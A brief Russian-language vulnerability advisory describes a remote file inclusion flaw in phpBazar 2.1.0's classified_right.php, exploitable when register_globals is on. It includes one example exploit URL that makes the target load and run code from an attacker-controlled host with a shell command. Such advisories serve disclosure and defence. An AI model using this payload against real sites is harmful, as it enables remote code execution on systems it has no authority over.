Программа: phpBazar 2.1.0, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "language_dir" в сценарии "classified_right.php". Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для
удачной эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

http://victim/classified_right.php?language_dir= http://yourhost/cmd.gif?cmd=ls

 



Оставить мнение